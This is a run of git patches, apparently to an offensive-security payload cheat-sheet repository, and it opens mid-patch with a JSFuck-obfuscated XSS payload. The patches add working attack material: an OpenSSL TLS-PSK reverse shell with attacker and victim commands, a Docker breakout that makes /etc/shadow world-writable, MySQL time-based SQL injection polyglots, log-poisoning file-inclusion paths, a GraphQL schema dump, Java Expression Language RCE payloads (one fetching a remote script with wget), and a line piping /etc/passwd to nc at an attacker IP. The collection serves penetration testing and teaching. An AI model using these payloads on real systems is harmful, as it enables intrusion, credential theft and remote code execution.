+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()
+```
+
 ## CSP Bypass
 
 Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) and the post : [How to use Google’s CSP Evaluator to bypass CSP](https://websecblog.com/vulns/google-csp-evaluator/)

From f86837ca8c3afe511ba10f5a82d418f3d8dc7ce7 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Wed, 24 Jun 2020 12:10:41 +0200
Subject: [PATCH 79/85] Fix #211

---
 SQL Injection/PostgreSQL Injection.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md
index d21dfca..e25c1c5 100644
--- a/SQL Injection/PostgreSQL Injection.md	
+++ b/SQL Injection/PostgreSQL Injection.md	
@@ -208,5 +208,5 @@ SELECT system('cat /etc/passwd | nc <attacker IP> <attacker port>');
 * [A Penetration Tester’s Guide to PostgreSQL - David Hayter](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9)
 * [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - Mar 20 2019 - GreenWolf](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5)
 * [SQL Injection /webApp/oma_conf ctx parameter (viestinta.lahitapiola.fi) - December 8, 2016 - Sergey Bobrov (bobrov)](https://hackerone.com/reports/181803)
-* [POSTGRESQL 9.X REMOTE COMMAND EXECUTION - 26 Oct 17 - Daniel](https://www.dionach.com/blog/postgresql-9x-remote-command-execution)
+* [POSTGRESQL 9.X REMOTE COMMAND EXECUTION - 26 Oct 17 - Daniel](https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/)
 * [SQL Injection and Postgres - An Adventure to Eventual RCE - May 05, 2020 - Denis Andzakovic](https://pulsesecurity.co.nz/articles/postgres-sqli)

From 5b1a79cb56ce5b8de6c9b2458d87f800c6dfd78f Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sat, 4 Jul 2020 19:00:56 +0200
Subject: [PATCH 80/85] Docker device file breakout

---
 .../Container - Docker Pentest.md                     | 11 +++++++++++
 SQL Injection/README.md                               |  3 +++
 2 files changed, 14 insertions(+)

diff --git a/Methodology and Resources/Container - Docker Pentest.md b/Methodology and Resources/Container - Docker Pentest.md
index 55b3cb3..b8faaa3 100644
--- a/Methodology and Resources/Container - Docker Pentest.md	
+++ b/Methodology and Resources/Container - Docker Pentest.md	
@@ -10,6 +10,7 @@
 - [Insecure Docker Registry](#insecure-docker-registry)
 - [Exploit privileged container abusing the Linux cgroup v1](#exploit-privileged-container-abusing-the-linux-cgroup-v1)
 - [Breaking out of Docker via runC](#breaking-out-of-docker-via-runc)
+- [Breaking out of containers using a device file](#breaking-out-of-containers-using-a-device-file)
 - [References](#references)
 
 ## Tools
@@ -164,6 +165,16 @@ $ docker build -t cve-2019-5736:malicious_image_POC ./RunC-CVE-2019-5736/malicio
 $ docker run --rm cve-2019-5736:malicious_image_POC
 ```
 
+## Breaking out of containers using a device file
+
+```powershell
+https://github.com/FSecureLABS/fdpasser
+In container, as root: ./fdpasser recv /moo /etc/shadow
+Outside container, as UID 1000: ./fdpasser send /proc/$(pgrep -f "sleep 1337")/root/moo
+Outside container: ls -la /etc/shadow
+Output: -rwsrwsrwx 1 root shadow 1209 Oct 10  2019 /etc/shadow
+```
+
 ## References
 
 - [Hacking Docker Remotely - 17 March 2020 - ch0ks](https://hackarandas.com/blog/2020/03/17/hacking-docker-remotely/)
diff --git a/SQL Injection/README.md b/SQL Injection/README.md
index 353feca..693ed56 100644
--- a/SQL Injection/README.md	
+++ b/SQL Injection/README.md	
@@ -387,6 +387,9 @@ Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj.
 
 ```sql
 SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
+
+/* MySQL only */
+IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/
 ```
 
 ## Routed injection

From d317b46af963fd82ea33ae20cdbb78cd3ed4ed05 Mon Sep 17 00:00:00 2001
From: Milan Veljkovic <m-veljkovic@users.noreply.github.com>
Date: Mon, 6 Jul 2020 23:43:47 +0200
Subject: [PATCH 81/85] Update README.md

I met with /var/log/apache2/ more often than /var/log/apache/ and i believe if someone is following this list, the apache2 items will make a difference. Cheers !
---
 File Inclusion/README.md | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/File Inclusion/README.md b/File Inclusion/README.md
index 964961a..178729e 100644
--- a/File Inclusion/README.md	
+++ b/File Inclusion/README.md	
@@ -289,6 +289,8 @@ Just append your PHP code into the log file by doing a request to the service (A
 ```powershell
 http://example.com/index.php?page=/var/log/apache/access.log
 http://example.com/index.php?page=/var/log/apache/error.log
+http://example.com/index.php?page=/var/log/apache2/access.log
+http://example.com/index.php?page=/var/log/apache2/error.log
 http://example.com/index.php?page=/var/log/nginx/access.log
 http://example.com/index.php?page=/var/log/nginx/error.log
 http://example.com/index.php?page=/var/log/vsftpd.log

From 1553115e1974dcd37c1a6a6e057cacd7b8046744 Mon Sep 17 00:00:00 2001
From: marcan2020 <marcan2020@gmail.com>
Date: Tue, 7 Jul 2020 22:03:01 -0400
Subject: [PATCH 82/85] Add introspection without fragments

---
 GraphQL Injection/README.md | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md
index 12734ff..e602f85 100644
--- a/GraphQL Injection/README.md	
+++ b/GraphQL Injection/README.md	
@@ -156,6 +156,12 @@ query IntrospectionQuery {
 }
 ```
 
+Single line query to dump the database schema without fragments.
+
+```js
+__schema{queryType{name},mutationType{name},types{kind,name,description,fields(includeDeprecated:true){name,description,args{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue},type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},isDeprecated,deprecationReason},inputFields{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue},interfaces{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},enumValues(includeDeprecated:true){name,description,isDeprecated,deprecationReason,},possibleTypes{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}}},directives{name,description,locations,args{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue}}}
+```
+
 ### List path
 
 ```php

From 2d7d6d6eed40f4a8d02e155a84b5671267459625 Mon Sep 17 00:00:00 2001
From: Artiom Mocrenco <artiom.mocrenco@gmail.com>
Date: Wed, 8 Jul 2020 17:01:38 +0300
Subject: [PATCH 83/85] Add TLS-PSK OpenSSL reverse shell method

---
 Methodology and Resources/Reverse Shell Cheatsheet.md | 11 +++++++++++
 1 file changed, 11 insertions(+)

diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md
index 0362a8a..4384d00 100644
--- a/Methodology and Resources/Reverse Shell Cheatsheet.md	
+++ b/Methodology and Resources/Reverse Shell Cheatsheet.md	
@@ -175,6 +175,17 @@ user@attack$ ncat --ssl -vv -l -p 4242
 user@victim$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.0.0.1:4242 > /tmp/s; rm /tmp/s
 ```
 
+TLS-PSK (does not rely on PKI or self-signed certificates)
+```bash
+# generate 48-bit PSK
+# use the generated string as a value for the two PSK variables from below
+openssl rand -hex 48 
+# server (attacker)
+export LHOST="*"; export LPORT="4242"; export PSK="replacewithgeneratedpskfromabove"; openssl s_server -quiet -tls1_2 -cipher PSK-CHACHA20-POLY1305:PSK-AES256-GCM-SHA384:PSK-AES256-CBC-SHA384:PSK-AES128-GCM-SHA256:PSK-AES128-CBC-SHA256 -psk $PSK -nocert -accept $LHOST:$LPORT
+# client (victim)
+export RHOST="10.0.0.1"; export RPORT="4242"; export PSK="replacewithgeneratedpskfromabove"; export PIPE="/tmp/`openssl rand -hex 4`"; mkfifo $PIPE; /bin/sh -i < $PIPE 2>&1 | openssl s_client -quiet -tls1_2 -psk $PSK -connect $RHOST:$RPORT > $PIPE; rm $PIPE
+```
+
 ### Powershell
 
 ```powershell

From 62443a37538fb5012f359e9c96e95de913ffe6e2 Mon Sep 17 00:00:00 2001
From: Artiom Mocrenco <artiom.mocrenco@gmail.com>
Date: Wed, 8 Jul 2020 18:01:12 +0300
Subject: [PATCH 84/85] fix typo

---
 Methodology and Resources/Reverse Shell Cheatsheet.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md
index 4384d00..2617724 100644
--- a/Methodology and Resources/Reverse Shell Cheatsheet.md	
+++ b/Methodology and Resources/Reverse Shell Cheatsheet.md	
@@ -177,7 +177,7 @@ user@victim$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -
 
 TLS-PSK (does not rely on PKI or self-signed certificates)
 ```bash
-# generate 48-bit PSK
+# generate 384-bit PSK
 # use the generated string as a value for the two PSK variables from below
 openssl rand -hex 48 
 # server (attacker)

From 2c935df34da62b8af21ccc3eafb3f52160610019 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Fri, 10 Jul 2020 15:05:13 +0200
Subject: [PATCH 85/85] EL Injection - SSTI

---
 Server Side Template Injection/README.md | 49 +++++++++++++++++++++++-
 1 file changed, 48 insertions(+), 1 deletion(-)

diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index eb78c9d..2f88b82 100644
--- a/Server Side Template Injection/README.md	
+++ b/Server Side Template Injection/README.md	
@@ -14,6 +14,9 @@
   * [Basic injection](#basic-injection)
   * [Retrieve the system’s environment variables](retrieve-the-system-s-environment-variables)
   * [Retrieve /etc/passwd](#retrieve--etc-passwd)
+* [Expression Language EL](#expression-language-el)
+  * [Basic injection](#basic-injection)
+  * [Code execution](#code-execution)
 * [Twig](#twig)
   * [Basic injection](#basic-injection)
   * [Template format](#template-format)
@@ -97,7 +100,7 @@ Execute code using SSTI for ERB engine.
 <%= system('cat /etc/passwd') %>
 <%= `ls /` %>
 <%= IO.popen('ls /').readlines()  %>
-<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>
+<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>
 <% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>
 ```
 
@@ -134,6 +137,47 @@ ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
 ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
 ```
 
+## Expression Language EL
+
+### Basic injection
+
+```java
+${1+1} 
+#{1+1}
+```
+
+### Code Execution
+
+
+```java
+// Common RCE payloads
+''.class.forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(<COMMAND STRING/ARRAY>)
+''.class.forName('java.lang.ProcessBuilder').getDeclaredConstructors()[1].newInstance(<COMMAND ARRAY/LIST>).start()
+
+// Method using Runtime
+#{session.setAttribute("rtc","".getClass().forName("java.lang.Runtime").getDeclaredConstructors()[0])}
+#{session.getAttribute("rtc").setAccessible(true)}
+#{session.getAttribute("rtc").getRuntime().exec("/bin/bash -c whoami")}
+
+// Method using processbuilder
+${request.setAttribute("c","".getClass().forName("java.util.ArrayList").newInstance())}
+${request.getAttribute("c").add("cmd.exe")}
+${request.getAttribute("c").add("/k")}
+${request.getAttribute("c").add("ping x.x.x.x")}
+${request.setAttribute("a","".getClass().forName("java.lang.ProcessBuilder").getDeclaredConstructors()[0].newInstance(request.getAttribute("c")).start())}
+${request.getAttribute("a")}
+
+// Method using Reflection & Invoke
+${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("calc.exe")}
+
+// Method using ScriptEngineManager one-liner
+${request.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(\\\"ping x.x.x.x\\\")"))}
+
+// Method using ScriptEngineManager
+${facesContext.getExternalContext().setResponseHeader("output","".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval(\"var x=new java.lang.ProcessBuilder;x.command(\\\"wget\\\",\\\"http://x.x.x.x/1.sh\\\");org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\"))}
+```
+
+
 ## Twig
 
 ### Basic injection
@@ -464,3 +508,6 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230
 * [EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018](https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf)
 * [Server Side Template Injection – on the example of Pebble - MICHAŁ BENTKOWSKI | September 17, 2019](https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/)
 * [Server-Side Template Injection (SSTI) in ASP.NET Razor - Clément Notin - 15 APR 2020](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/)
+* [Expression Language injection - PortSwigger](https://portswigger.net/kb/issues/00100f20_expression-language-injection)
+* [Bean Stalking: Growing Java beans into RCE - July 7, 2020 - Github Security Lab](https://securitylab.github.com/research/bean-validation-RCE)
+* [Remote Code Execution with EL Injection Vulnerabilities - Asif Durani - 29/01/2019](https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf)
\ No newline at end of file